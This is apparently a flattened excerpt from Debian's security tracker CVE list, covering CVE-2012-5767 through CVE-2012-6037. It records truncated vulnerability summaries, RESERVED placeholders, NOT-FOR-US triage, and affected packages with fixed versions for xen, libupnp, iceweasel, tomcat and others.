(Directory traversal vulnerability in ibrowser.php in the CMScout 2.09 ...) NOT-FOR-US: CMScout IBrowser TinyMCE Plugin CVE-2010-5280 (Directory traversal vulnerability in the Community Builder Enhanced ...) NOT-FOR-US: CBE for Joomla CVE-2012-6037 (Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.4.x ...) {DSA-2591-1} - mahara 1.5.1-3 CVE-2012-6036 (The (1) memc_save_get_next_page, (2) tmemc_restore_put_page and (3) ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6035 (The do_tmem_destroy_pool function in the Transcendent Memory (TMEM) in ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6034 (The (1) tmemc_save_get_next_page and (2) tmemc_save_get_next_inv ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6033 (The do_tmem_control function in the Transcendent Memory (TMEM) in Xen ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6032 (Multiple integer overflows in the (1) tmh_copy_from_client and (2) ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6031 (The do_tmem_get function in the Transcendent Memory (TMEM) in Xen 4.0, ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6030 (The do_tmem_op function in the Transcendent Memory (TMEM) in Xen 4.0, ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6029 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: Cisco NAC Appliance CVE-2012-6028 RESERVED CVE-2012-6027 RESERVED CVE-2012-6026 (The HTTP Profiler on the Cisco Aironet Access Point with software 15.2 ...) NOT-FOR-US: Cisco Aironet Access Point CVE-2012-6025 RESERVED CVE-2012-6024 RESERVED CVE-2012-6023 RESERVED CVE-2012-6022 RESERVED CVE-2012-6021 RESERVED CVE-2012-6020 RESERVED CVE-2012-6019 RESERVED CVE-2012-6018 RESERVED CVE-2012-6017 RESERVED CVE-2012-6016 RESERVED CVE-2012-6015 RESERVED CVE-2012-6014 RESERVED CVE-2012-6013 RESERVED CVE-2012-6012 RESERVED CVE-2012-6011 RESERVED CVE-2012-6010 RESERVED CVE-2012-6009 RESERVED CVE-2012-6008 RESERVED CVE-2012-6007 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Cisco CVE-2012-6006 RESERVED CVE-2012-6005 RESERVED CVE-2012-6004 RESERVED CVE-2012-6003 RESERVED CVE-2012-6002 RESERVED CVE-2012-6001 RESERVED CVE-2012-6000 RESERVED CVE-2012-5999 RESERVED CVE-2012-5998 RESERVED CVE-2012-5997 RESERVED CVE-2012-5996 RESERVED CVE-2012-5995 RESERVED CVE-2012-5994 RESERVED CVE-2012-5993 RESERVED CVE-2012-5992 (Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco ...) NOT-FOR-US: Cisco CVE-2012-5991 (screens/base/web_auth_custom.html on Cisco Wireless LAN Controller ...) NOT-FOR-US: Cisco CVE-2012-5990 RESERVED CVE-2012-5989 RESERVED CVE-2012-5988 RESERVED CVE-2012-5987 RESERVED CVE-2012-5986 RESERVED CVE-2012-5985 RESERVED CVE-2012-5984 RESERVED CVE-2012-5983 RESERVED CVE-2012-5982 RESERVED CVE-2012-5981 RESERVED CVE-2012-5980 RESERVED CVE-2012-5978 (Multiple directory traversal vulnerabilities in the (1) View ...) NOT-FOR-US: VMware View CVE-2012-5977 (Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and ...) {DSA-2605-1} - asterisk 1:1.8.13.1~dfsg-2 (bug #697230) NOTE: http://downloads.asterisk.org/pub/security/AST-2012-015.pdf CVE-2012-5976 (Multiple stack consumption vulnerabilities in Asterisk Open Source ...) {DSA-2605-1} - asterisk 1:1.8.13.1~dfsg-2 (bug #697230) NOTE: http://downloads.digium.com/pub/security/AST-2012-014.pdf CVE-2012-5975 (The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 ...) NOT-FOR-US: Tectia SSH CVE-2012-5974 RESERVED CVE-2012-5973 (CA XCOM Data Transport r11.0 and r11.5 on UNIX and Linux allows remote ...) NOT-FOR-US: CA XCOM Data Transport CVE-2012-5972 (Directory traversal vulnerability in the web server in SpecView 2.5 ...) NOT-FOR-US: SpecView 2.5 CVE-2012-5971 RESERVED CVE-2012-5970 (The Huawei E585 device allows remote attackers to cause a denial of ...) NOT-FOR-US: Huawei device CVE-2012-5969 (Multiple directory traversal vulnerabilities on the Huawei E585 device ...) NOT-FOR-US: Huawei device CVE-2012-5968 (The Huawei E585 device does not validate the status of admin sessions, ...) NOT-FOR-US: Huawei device CVE-2012-5967 (SQL injection vulnerability in menuXML.php in Centreon 2.3.3 through ...) NOT-FOR-US: Centreon CVE-2012-5966 (The restricted telnet shell on the D-Link DSL2730U router allows ...) NOT-FOR-US: D-Link DSL2730U router CVE-2012-5965 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5964 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5963 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5962 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5961 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5960 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5959 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5958 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5957 RESERVED CVE-2012-5956 (Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ...) NOT-FOR-US: ManageEngine AssetExplorer 5.6 CVE-2012-5955 (Unspecified vulnerability in the IBM HTTP Server component 5.3 in IBM ...) NOT-FOR-US: WebSphere CVE-2012-5954 (Unspecified vulnerability in IBM Tivoli Storage Manager for Space ...) NOT-FOR-US: IBM Tivoli Storage Manager CVE-2012-5953 (IBM WebSphere Message Broker 6.1 before 6.1.0.12, 7.0 before 7.0.0.6, ...) NOT-FOR-US: IBM CVE-2012-5952 (IBM WebSphere Message Broker 6.1 before 6.1.0.12, 7.0 before 7.0.0.6, ...) NOT-FOR-US: IBM CVE-2012-5951 (Unspecified vulnerability in IBM Tivoli NetView 1.4, 5.1 through 5.4, ...) NOT-FOR-US: IBM Tivoli NetView CVE-2012-5950 (Multiple cross-site request forgery (CSRF) vulnerabilities in IBM ...) NOT-FOR-US: IBM TRIRIGA Application Platform CVE-2012-5949 (Multiple cross-site scripting (XSS) vulnerabilities in IBM TRIRIGA ...) NOT-FOR-US: IBM TRIRIGA Application Platform CVE-2012-5948 (Multiple cross-site scripting (XSS) vulnerabilities in IBM TRIRIGA ...) NOT-FOR-US: IBM TRIRIGA Application Platform CVE-2012-5947 (Buffer overflow in the vsflex7l ActiveX control in IBM SPSS ...) NOT-FOR-US: IBM SPSS SamplePower CVE-2012-5946 (Buffer overflow in the c1sizer ActiveX control in C1sizer.ocx in IBM ...) NOT-FOR-US: IBM SPSS SamplePower CVE-2012-5945 (Multiple buffer overflows in the Vsflex8l ActiveX control in IBM SPSS ...) NOT-FOR-US: IBM SPSS SamplePower CVE-2012-5944 RESERVED CVE-2012-5943 (Cross-site scripting (XSS) vulnerability in IBM iNotes 8.5.x before ...) NOT-FOR-US: IBM iNotes CVE-2012-5942 (Cross-site scripting (XSS) vulnerability in the Data Management Portal ...) NOT-FOR-US: IBM Tivoli TADDM CVE-2012-5941 (Cross-site scripting (XSS) vulnerability in the WebAdmin application ...) NOT-FOR-US: IBM CVE-2012-5940 (The WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM ...) NOT-FOR-US: IBM CVE-2012-5939 (Cross-site scripting (XSS) vulnerability in Welcome.do in the Data ...) NOT-FOR-US: IBM Tivoli TADDM CVE-2012-5938 (The installation process in IBM InfoSphere Information Server 8.1, ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2012-5937 (Unspecified vulnerability in the CLA2 server in IBM Gentran ...) NOT-FOR-US: IBM Gentran Integration CVE-2012-5936 RESERVED CVE-2011-5245 (The readFrom function in providers.jaxb.JAXBXmlTypeProvider in ...) NOT-FOR-US: RESTEasy framework for JBoss CVE-2012-5935 RESERVED CVE-2012-5934 RESERVED CVE-2012-5933 RESERVED CVE-2012-5932 (Eval injection vulnerability in the ldapagnt_eval function in ...) NOT-FOR-US: NetIQ Privileged User Manager 2.3.x CVE-2012-5931 (Directory traversal vulnerability in the set_log_config function in ...) NOT-FOR-US: NetIQ Privileged User Manager 2.3.x CVE-2012-5930 (The pa_modify_accounts function in auth.dll in unifid.exe in NetIQ ...) NOT-FOR-US: NetIQ Privileged User Manager 2.3.x CVE-2012-5929 RESERVED CVE-2012-5928 RESERVED CVE-2012-5927 RESERVED CVE-2012-5926 RESERVED CVE-2012-5925 RESERVED CVE-2012-5924 RESERVED CVE-2012-5923 RESERVED CVE-2012-5922 RESERVED CVE-2012-5921 RESERVED CVE-2012-5920 (Cross-site scripting (XSS) vulnerability in Google Web Toolkit (GWT) ...) - gwt (bug #691900) [squeeze] - gwt (Vulnerable code not present) CVE-2012-5919 (Multiple cross-site scripting (XSS) vulnerabilities in Havalite 1.0.4 ...) NOT-FOR-US: havalite CVE-2012-5918 (razorCMS 1.2 allows remote authenticated users to access administrator ...) NOT-FOR-US: razorCMS CVE-2012-5917 (SnackAmp 3.1.3 allows remote attackers to cause a denial of service ...) NOT-FOR-US: SnackAmp CVE-2012-5916 (Neocrome Seditio build 161 allows remote attackers to obtain sensitive ...) NOT-FOR-US: Neocrome Seditio CVE-2012-5915 (Neocrome Seditio build 161 and earlier allows remote attackers to ...) NOT-FOR-US: Neocrome Seditio CVE-2012-5914 (Multiple cross-site scripting (XSS) vulnerabilities in the sed_import ...) NOT-FOR-US: Neocrome Seditio CVE-2012-5913 (Cross-site scripting (XSS) vulnerability in wp-integrator.php in the ...) NOT-FOR-US: Wordpress Integrator plugin CVE-2012-5912 (Multiple SQL injection vulnerabilities in PicoPublisher 2.0 allow ...) NOT-FOR-US: PicoPublisher CVE-2012-5911 (Cross-site scripting (XSS) vulnerability in blogs/blog1.php in ...) NOT-FOR-US: b2evolution CVE-2012-5910 (SQL injection vulnerability in blogs/htsrv/viewfile.php in b2evolution ...) NOT-FOR-US: b2evolution CVE-2012-5909 (SQL injection vulnerability in admin/modules/user/users.php in MyBB ...) NOT-FOR-US: MyBB CVE-2012-5908 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: MyBB CVE-2012-5907 (Directory traversal vulnerability in json.php in TomatoCart 1.2.0 ...) NOT-FOR-US: TomatoCart CVE-2012-5906 (Multiple cross-site scripting (XSS) vulnerabilities in GreenBrowser ...) NOT-FOR-US: GreenBrowser CVE-2012-5905 (Buffer overflow in KnFTPd 1.0.0 allows remote authenticated users to ...) NOT-FOR-US: KnFTPd CVE-2012-5904 (Heap-based buffer overflow in IrfanView before 4.33 allows remote ...) NOT-FOR-US: IrfanView CVE-2012-5903 (Cross-site scripting (XSS) vulnerability in Simple Machines Forum ...) NOT-FOR-US: Simple Machine Forum CVE-2012-5902 (Cross-site scripting (XSS) vulnerability in ptk/lib/modal_bookmark.php ...) NOT-FOR-US: DFLabs PTK CVE-2012-5901 (DFLabs PTK 1.0.5 stores data files with predictable names under the ...) NOT-FOR-US: DFLabs PTK CVE-2012-5900 (Multiple SQL injection vulnerabilities in SAMEDIA LandShop 0.9.2 allow ...) NOT-FOR-US: SAMEDIA LandShop CVE-2012-5899 (Cross-site scripting (XSS) vulnerability in admin/action/objects.php ...) NOT-FOR-US: SAMEDIA LandShop CVE-2012-5898 (Cross-site request forgery (CSRF) vulnerability in SAMEDIA LandShop ...) NOT-FOR-US: SAMEDIA LandShop CVE-2012-5897 (The (1) SimpleTree and (2) ReportTree classees in the ARDoc ActiveX ...) NOT-FOR-US: Quest in Trust CVE-2012-5896 (The Annotation Objects Extension ActiveX control in AnnotateX.dll in ...) NOT-FOR-US: Quest in Trust CVE-2012-5895 (Multiple unspecified vulnerabilities in iRODS before 3.1 have unknown ...) NOT-FOR-US: iRODS CVE-2012-5894 (SQL injection vulnerability in hava_post.php in Havalite CMS 1.1.0 and ...) NOT-FOR-US: Havalite CMS CVE-2012-5893 (Unrestricted file upload vulnerability in hava_upload.php in Havalite ...) NOT-FOR-US: Havalite CMS CVE-2012-5892 (Havalite CMS 1.1.0 and earlier stores sensitive information under the ...) NOT-FOR-US: Havalite CMS CVE-2012-5891 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: Dalbum CVE-2012-5890 (The Front End User Registration (sr_feuser_register) extension before ...) NOT-FOR-US: Typo3 extension (sr_feuser_register) CVE-2012-5889 (Cross-site scripting (XSS) vulnerability in the powermail extension ...) NOT-FOR-US: Typo3 extension (powermail) CVE-2012-5888 (Cross-site scripting (XSS) vulnerability in Basic SEO Features ...) NOT-FOR-US: Typo3 extension (seo_basics) CVE-2012-5887 (The HTTP Digest Access Authentication implementation in Apache Tomcat ...) - tomcat6 6.0.35-5+nmu1 (bug #692439) - tomcat7 7.0.28-3+nmu1 (bug #692440) CVE-2012-5886 (The HTTP Digest Access Authentication implementation in Apache Tomcat ...) - tomcat6 6.0.35-5+nmu1 (bug #692439) - tomcat7 7.0.28-3+nmu1 (bug #692440) CVE-2012-5885 (The replay-countermeasure functionality in the HTTP Digest Access ...) - tomcat6 6.0.35-5+nmu1 (bug #692439) - tomcat7 7.0.28-3+nmu1 (bug #692440) CVE-2011-5244 (Multiple off-by-one errors in the (1) token and (2) linetoken ...) {DSA-2357-1} - evince 2.32.0-1 NOTE: This issue was already fixed in DSA-2357-1 by shipping the correct fix from the start CVE-2012-5884 (The User.get method in Bugzilla/WebService/User.pm in Bugzilla 4.3.2 ...) - bugzilla (low) [squeeze] - bugzilla (vulnerable code not present in 3.x) - bugzilla4 (bug #669643) CVE-2012-5883 (Cross-site scripting (XSS) vulnerability in the Flash component ...) - yui3 - yui 2.9.0.dfsg.0.1-0.1 (bug #693608) - icinga-web 1.7.1+dfsg2-6 (bug #694641) CVE-2012-5882 (Cross-site scripting (XSS) vulnerability in the Flash component ...) - yui3 - yui 2.9.0.dfsg.0.1-0.1 (bug #693608) - icinga-web 1.7.1+dfsg2-6 (bug #694641) CVE-2012-5881 (Cross-site scripting (XSS) vulnerability in the Flash component ...) - yui3 - yui 2.9.0.dfsg.0.1-0.1 (bug #693608) - icinga-web 1.7.1+dfsg2-6 (bug #694641) CVE-2012-5880 RESERVED CVE-2012-5879 (An ActiveX control in McHealthCheck.dll in McAfee Virtual Technician ...) NOT-FOR-US: McAfee Virtual Technician CVE-2012-5878 RESERVED CVE-2012-5877 RESERVED CVE-2012-5876 RESERVED CVE-2012-5875 (Firefly Media Server 1.0.0.1359 allows remote attackers to cause a ...) NOT-FOR-US: Firefly Media Server CVE-2012-5874 (Multiple SQL injection vulnerabilities in the (1) ...) NOT-FOR-US: Elite Bulletin Board CVE-2012-5873 RESERVED CVE-2012-5872 RESERVED CVE-2012-5871 RESERVED CVE-2012-5870 RESERVED CVE-2012-5869 RESERVED CVE-2012-5868 (WordPress 3.4.2 does not invalidate a wordpress_sec session cookie ...) - wordpress (bug #696868) CVE-2012-5867 RESERVED CVE-2012-5866 RESERVED CVE-2012-5865 RESERVED CVE-2012-5864 (The management web pages on the Sinapsi eSolar Light Photovoltaic ...) NOT-FOR-US: Sinapsi eSolar Light Photovoltaic System Monitor CVE-2012-5863 (ping.php on the Sinapsi eSolar Light Photovoltaic System Monitor (aka ...) NOT-FOR-US: Sinapsi eSolar Light Photovoltaic System Monitor CVE-2012-5862 (login.php on the Sinapsi eSolar Light Photovoltaic System Monitor (aka ...) NOT-FOR-US: Sinapsi eSolar Light Photovoltaic System Monitor CVE-2012-5861 (Multiple SQL injection vulnerabilities on the Sinapsi eSolar Light ...) NOT-FOR-US: Sinapsi eSolar Light Photovoltaic System Monitor CVE-2012-5860 (Unspecified vulnerability on Oberthur ID-One COSMO 5.2, 5.2a, and 64 ...) NOT-FOR-US: ID-One COSMO CVE-2012-XXXX [xscreensaver lock bypass] - libpam-rsa (low; bug #693087) CVE-2012-5859 (Samsung Kies Air 2.1.207051 and 2.1.210161 allows remote attackers to ...) NOT-FOR-US: Samsung Kies Air CVE-2012-5858 (Samsung Kies Air 2.1.207051 and 2.1.210161 relies on the IP address ...) NOT-FOR-US: Samsung Kies Air CVE-2012-5857 RESERVED CVE-2012-5856 (Cross-site scripting (XSS) vulnerability in the Uk Cookie (aka ...) NOT-FOR-US: Wordpress plugin (uk cookie) CVE-2012-5855 RESERVED - vlc (unimportant) NOTE: Harmless crasher without security relevance CVE-2012-5853 RESERVED CVE-2012-5852 RESERVED CVE-2012-5851 (html/parser/XSSAuditor.cpp in WebCore in WebKit, as used in Google ...) - chromium-browser (unimportant) - webkit (unimportant) NOTE: https://bugs.webkit.org/show_bug.cgi?id=92692 NOTE: Incomplete mitigation feature, not a security vulnerability per se CVE-2012-5850 RESERVED CVE-2012-5849 RESERVED CVE-2012-5854 (Heap-based buffer overflow in WeeChat 0.3.6 through 0.3.9 allows ...) - weechat 0.3.9.1-1 (bug #693026) [wheezy] - weechat 0.3.8-1+deb7u1 [squeeze] - weechat (Vulnerable code not present) CVE-2012-5848 RESERVED CVE-2012-5847 RESERVED CVE-2012-5846 RESERVED CVE-2012-5845 RESERVED CVE-2012-5844 RESERVED CVE-2012-5843 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-5842 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2588-1 DSA-2584-1 DSA-2583-1} - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 CVE-2012-5841 (Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-5840 (Use-after-free vulnerability in the nsTextEditorState::PrepareEditor ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-5839 (Heap-based buffer overflow in the ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-5838 (The copyTexImage2D implementation in the WebGL subsystem in Mozilla ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-5837 (The Web Developer Toolbar in Mozilla Firefox before 17.0 executes ...) - iceweasel (Doesn't affect the ESR series, only releases from experimental) CVE-2012-5836 (Mozilla Firefox before 17.0, Thunderbird before 17.0, and SeaMonkey ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-5835 (Integer overflow in the WebGL subsystem in Mozilla Firefox before ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-5834 RESERVED CVE-2012-5833 (The texImage2D implementation in the WebGL subsystem in Mozilla ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-5832 RESERVED CVE-2012-5831 RESERVED CVE-2012-5830 (Use-after-free vulnerability in Mozilla Firefox before 17.0, Firefox ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-5829 (Heap-based buffer overflow in the nsWindow::OnExposeEvent function in ...) {DSA-2588-1 DSA-2584-1 DSA-2583-1} - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 CVE-2012-5828 RESERVED CVE-2012-5827 (Joomla! 2.5.x before 2.5.8 and 3.0.x before 3.0.2 allows remote ...) - joomla (bug #571794) CVE-2012-5826 RESERVED CVE-2011-5243 (TwitterOAuth does not verify that the server hostname matches a domain ...) NOT-FOR-US: TwitterOAuth CVE-2011-5242 (tmhOAuth before 0.61 does not verify that the server hostname matches ...) NOT-FOR-US: tmhOAuth CVE-2011-5241 (Services_Twitter 0.6.3 does not verify that the server hostname ...) NOT-FOR-US: PEAR module for Twitter CVE-2011-5240 (Magento 1.5 and 1.6.2 does not verify that the server hostname matches ...) NOT-FOR-US: Magento CVE-2011-5239 (CiviCRM 4.0.5 and 4.1.1 does not verify that the server hostname ...) NOT-FOR-US: CiviCRM NOTE: RFP #645700 CVE-2011-5238 (google-checkout-php-sample-code before 1.3.2 does not verify that the ...) NOT-FOR-US: google-checkout-php-sample-code CVE-2011-5237 (PayPal WPS ToolKit does not verify that the server hostname matches a ...) NOT-FOR-US: PayPal WPS ToolKit CVE-2011-5236 (Moneris eSelectPlus 2.03 PHP API does not verify that the server ...) NOT-FOR-US: Moneris eSelectPlus 2.03 PHP API CVE-2012-5825 (Tweepy does not verify that the server hostname matches a domain name ...) - tweepy (low; bug #692444) [wheezy] - tweepy (Minor issue) CVE-2012-5824 (Trillian 5.1.0.19 does not verify that the server hostname matches a ...) NOT-FOR-US: Trillian CVE-2012-5823 (Open Source Classifieds does not verify that the server hostname ...) NOT-FOR-US: Open Source Classifieds CVE-2012-5822 (The contribution feature in Zamboni does not verify that the server ...) NOT-FOR-US: Zamboni CVE-2012-5821 (Lynx does not verify that the server's certificate is signed by a ...) - lynx-cur 2.8.8dev.15-1 (low; bug #692443) [squeeze] - lynx-cur (Minor issue) [wheezy] - lynx-cur (Minor issue) CVE-2012-5820 (The developer-account sample code in Google AdMob does not verify that ...) NOT-FOR-US: Google AdMob CVE-2012-5819 (FilesAnywhere does not verify that the server hostname matches a ...) NOT-FOR-US: FilesAnywhere CVE-2012-5818 (ElephantDrive does not verify that the server hostname matches a ...) NOT-FOR-US: ElephantDrive CVE-2012-5817 (Codehaus XFire 1.2.6 and earlier, as used in the Amazon EC2 API Tools ...) NOT-FOR-US: Codehaus XFire CVE-2012-5816 (AOL Instant Messenger (AIM) 1.0.1.2 does not verify that the server ...) NOT-FOR-US: AOL Instant Messenger CVE-2012-5815 (The Rackspace app 2.1.5 for iOS does not verify that the server ...) NOT-FOR-US: Rackspace app for iOS CVE-2012-5814 (Weberknecht, as used in GitHub Gaug.es and other products, does not ...) NOT-FOR-US: Weberknecht CVE-2012-5813 (The Android_Pusher library for Android does not verify that the server ...) NOT-FOR-US: Android app/lib CVE-2012-5812 (The ACRA library for Android does not verify that the server hostname ...) NOT-FOR-US: Android app/lib CVE-2012-5811 (The Breezy application for Android does not verify that the server ...) NOT-FOR-US: Android app/lib CVE-2012-5810 (The Chase mobile banking application for Android does not verify that ...) NOT-FOR-US: Android app/lib CVE-2012-5809 (The Groupon Redemptions application for Android does not verify that ...) NOT-FOR-US: Android app/lib CVE-2012-5808 (The LinkPoint module in Zen Cart does not verify that the server ...) NOT-FOR-US: Zen Cart module CVE-2012-5807 (The Authorize.Net eCheck module in Zen Cart does not verify that the ...) NOT-FOR-US: Zen Cart module CVE-2012-5806 (The PayPal Payments Pro module in Zen Cart does not verify that the ...) NOT-FOR-US: Zen Cart module CVE-2012-5805 (The PayPal IPN functionality in Zen Cart does not verify that the ...) NOT-FOR-US: Zen Cart module CVE-2012-5804 (The CyberSource module in Ubercart does not verify that the server ...) NOT-FOR-US: Ubercart module CVE-2012-5803 (The Authorize.Net module in Ubercart does not verify that the server ...) NOT-FOR-US: Ubercart module CVE-2012-5802 (The PayPal module in Ubercart does not verify that the server hostname ...) NOT-FOR-US: Ubercart module CVE-2012-5801 (The PayPal module in PrestaShop does not verify that the server ...) NOT-FOR-US: PrestaShop module CVE-2012-5800 (The eBay module in PrestaShop does not verify that the server hostname ...) NOT-FOR-US: PrestaShop module CVE-2012-5799 (The Canada Post (aka CanadaPost) module in PrestaShop does not verify ...) NOT-FOR-US: PrestaShop module CVE-2012-5798 (The PayPal Pro PayFlow EC module in osCommerce does not verify that ...) NOT-FOR-US: osCommerce module CVE-2012-5797 (The PayPal Pro PayFlow module in osCommerce does not verify that the ...) NOT-FOR-US: osCommerce module CVE-2012-5796 (The PayPal Pro module in osCommerce does not verify that the server ...) NOT-FOR-US: osCommerce module CVE-2012-5795 (The PayPal Express module in osCommerce does not verify that the ...) NOT-FOR-US: osCommerce module CVE-2012-5794 (The MoneyBookers module in osCommerce does not verify that the server ...) NOT-FOR-US: osCommerce module CVE-2012-5793 (The Authorize.Net module in osCommerce does not verify that the server ...) NOT-FOR-US: osCommerce module CVE-2012-5792 (The Sage Pay Direct module in osCommerce does not verify that the ...) NOT-FOR-US: osCommerce module CVE-2012-5791 (PayPal Invoicing does not verify that the server hostname matches a ...) NOT-FOR-US: PayPal Invoicing CVE-2012-5790 (PayPal Payments Standard PHP Library 20120427 does not verify that the ...) NOT-FOR-US: PayPal Payments Standard PHP Library CVE-2012-5789 (PayPal Payments Standard PHP Library before 20120427 does not verify ...) NOT-FOR-US: PayPal Payments Standard PHP Library CVE-2012-5788 (The PayPal IPN utility does not verify that the server hostname ...) NOT-FOR-US: The PayPal IPN utility CVE-2012-5787 (The PayPal merchant SDK does not verify that the server hostname ...) NOT-FOR-US: The PayPal merchant SDK CVE-2012-5786 (The wsdl_first_https sample code in ...) NOT-FOR-US: Apache CXF CVE-2012-5785 (Apache Axis2/Java 1.6.2 and earlier does not verify that the server ...) NOT-FOR-US: Axis2/Java NOTE: Axis2/C is packaged as axis2c, but this is a different software. CVE-2012-5784 (Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal ...) - axis 1.4-16.1 (bug #692650) CVE-2012-5783 (Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments ...) - commons-httpclient 3.1-10.1 (bug #692442) CVE-2012-5782 (Amazon Flexible Payments Service (FPS) PHP Library does not verify ...) NOT-FOR-US: Amazon Flexible Payments Service CVE-2012-5781 (Amazon Elastic Load Balancing API Tools does not verify that the ...) NOT-FOR-US: Amazon Elastic Load Balancing API Tools CVE-2012-5780 (The Amazon merchant SDK does not verify that the server hostname ...) NOT-FOR-US: The Amazon merchant SDK CVE-2012-5779 RESERVED CVE-2012-5778 RESERVED CVE-2012-5777 (Eval injection vulnerability in the ReplaceListVars function in the ...) NOT-FOR-US: EmpireCMS CVE-2012-5776 RESERVED CVE-2012-5775 RESERVED CVE-2012-5774 RESERVED CVE-2012-5773 RESERVED CVE-2012-5772 RESERVED CVE-2012-5771 RESERVED CVE-2012-5770 (The SSL configuration in IBM Tivoli Application Dependency Discovery ...) NOT-FOR-US: IBM CVE-2012-5769 (IBM SPSS Modeler 14.0, 14.1, 14.2 through FP3, and 15.0 before FP2 ...) NOT-FOR-US: IBM SPSS Modeler CVE-2012-5768 RESERVED CVE-2012-5767 (Unspecified vulnerability in the web interface on the IBM TS3500 Tape ...) 